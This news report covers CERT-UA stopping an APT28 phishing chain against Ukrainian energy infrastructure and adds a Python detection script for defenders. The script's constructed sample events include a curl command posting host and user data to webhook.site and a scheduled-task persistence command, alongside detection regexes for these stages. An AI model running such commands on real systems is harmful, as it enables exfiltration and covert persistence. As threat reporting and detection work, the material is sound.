Ukrainian CERT thwarts APT28 cyberattack on critical energy infrastructure


Ukraine’s Computer Emergency Response Team (CERT-UA) said on Tuesday it had foiled a cyberattack on unnamed critical energy infrastructure in the country.
The intrusion, according to the agency, began with a phishing email containing a link to a malicious ZIP archive that activates the infection chain.
“Visiting the link will download a ZIP archive containing three JPG images (decoys) and a BAT file ‘weblinks.cmd’ to the victim’s computer”, CERT-UA said, attributing the activity to the Russian threat actor known as APT28 (aka BlueDelta, Fancy Bear, Forest Blizzard or FROZENLAKE).

“When a CMD file is executed, several decoy web pages will be opened, .bat and .vbs files will be created and a VBS file will be launched, which in turn will execute the BAT file.”
The next phase of the attack involves running the “whoami” command on the compromised host and exfiltrating the information, as well as downloading the hidden TOR service to route the malicious traffic.
Persistence is achieved by means of a scheduled task, and remote command execution is implemented using cURL via a legitimate service called webhook.site, which was recently revealed to be used by a malicious actor known as Dark Pink.
CERT-UA said the attack ultimately failed because access to Mocky and to Windows Script Host (wscript.exe) had been restricted on the targeted systems. It should be noted that APT28 has been linked to the use of Mocky APIs in the past.
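As an added illustration, not part of CERT-UA's advisory or of this report, the Python script below runs a handful of detection rules derived from the chain described above (script host launched against a file in a user-writable directory, cmd.exe spawned by wscript.exe, cURL reaching webhook.site or Mocky, a scheduled task whose action is a script host) over constructed Sysmon-style process-creation events. The file names, paths, task name, hostnames and webhook URL in the sample events are assumptions made for the example and are not indicators from the advisory.

```python
"""Toy detection pass over constructed Sysmon Event ID 1-style records.

Added example, not CERT-UA's or the article's code. Field names follow
Sysmon's Image / CommandLine / ParentImage; every path, file name, task
name and URL below is constructed for illustration.
"""
import re
from dataclasses import dataclass

# Locations a phishing-delivered archive or its dropped .bat/.vbs typically land in.
USER_WRITABLE = re.compile(r"\\(?:Temp|Downloads|AppData\\Local|ProgramData)\\", re.I)
# Legitimate request-catcher / mock-API services abused as a C2 relay in this chain.
CALLBACK_SERVICES = re.compile(r"https?://[^\s\"']*(?:webhook\.site|mocky\.io)", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe", "powershell.exe", "bitsadmin.exe", "certutil.exe"}


@dataclass
class Event:
    image: str         # full path of the created process
    command_line: str  # its command line
    parent_image: str  # full path of the parent process


def exe_name(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (event_index, rule_name) pairs for every rule each event triggers."""
    findings = []
    for idx, ev in enumerate(events):
        img, parent, cmd = exe_name(ev.image), exe_name(ev.parent_image), ev.command_line
        # Rule 1: Windows Script Host executing a script from a user-writable directory.
        if img in SCRIPT_HOSTS and USER_WRITABLE.search(cmd):
            findings.append((idx, "script_host_user_writable"))
        # Rule 2: the VBS stage launching the BAT stage via cmd.exe.
        if img == "cmd.exe" and parent in SCRIPT_HOSTS:
            findings.append((idx, "cmd_from_script_host"))
        # Rule 3: a LOLBIN downloader talking to a webhook/mock-API service.
        if img in DOWNLOADERS and CALLBACK_SERVICES.search(cmd):
            findings.append((idx, "c2_over_webhook_service"))
        # Rule 4: scheduled task whose action is a script host or shell (persistence).
        if (img == "schtasks.exe" and re.search(r"/create\b", cmd, re.I)
                and re.search(r"/tr\b.*?(?:wscript|cscript|cmd\.exe|curl|powershell)", cmd, re.I)):
            findings.append((idx, "schtasks_persistence_script"))
    return findings


def flag_host(events, threshold: int = 3) -> bool:
    """Escalate when at least `threshold` distinct stages of the chain fire on one host."""
    return len({rule for _, rule in detect(events)}) >= threshold


# Constructed sample telemetry: one host running the described chain plus a benign curl.
SAMPLE_EVENTS = [
    Event(r"C:\Windows\explorer.exe", "explorer.exe", r"C:\Windows\System32\userinit.exe"),
    Event(r"C:\Windows\System32\cmd.exe",
          r'cmd.exe /c "C:\Users\alice\Downloads\weblinks.cmd"',
          r"C:\Windows\explorer.exe"),
    Event(r"C:\Windows\System32\wscript.exe",
          r'wscript.exe "C:\Users\alice\AppData\Local\Temp\link.vbs"',
          r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\cmd.exe",
          r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\run.bat"',
          r"C:\Windows\System32\wscript.exe"),
    Event(r"C:\Windows\System32\curl.exe",
          r'curl.exe -s -X POST -d "DESKTOP-1\alice" https://webhook.site/00000000-0000-0000-0000-000000000000',
          r"C:\Windows\System32\cmd.exe"),
    Event(r"C:\Windows\System32\schtasks.exe",
          r'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr "wscript.exe C:\Users\alice\AppData\Local\Temp\link.vbs" /f',
          r"C:\Windows\System32\cmd.exe"),
    # Benign: an administrator's health check against an internal API (should not fire).
    Event(r"C:\Windows\System32\curl.exe",
          "curl.exe https://intranet.example.local/health",
          r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}  <- {SAMPLE_EVENTS[idx].command_line}")
    print("escalate host:", flag_host(SAMPLE_EVENTS))
```

Each rule alone is noisy (administrators do run cURL and create scheduled tasks), so the script only escalates when several distinct stages of the chain appear on the same host. The preventive counterpart is what CERT-UA credits with stopping this intrusion: denying wscript.exe for ordinary users via AppLocker or Software Restriction Policies, and blocking egress to request-catcher services such as webhook.site and Mocky that have no business need.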
The disclosure comes amid ongoing phishing attacks targeting Ukraine, some of which were observed leveraging an off-the-shelf malware obfuscation engine named ScruptCrypt to distribute AsyncRAT.
Another cyberattack mounted by GhostWriter (aka UAC-0057 or UNC1151) allegedly used a recently revealed zero-day flaw in WinRAR (CVE-2023-38831, CVSS score: 7.8) to deploy PicassoLoader and Cobalt Strike, the agency said.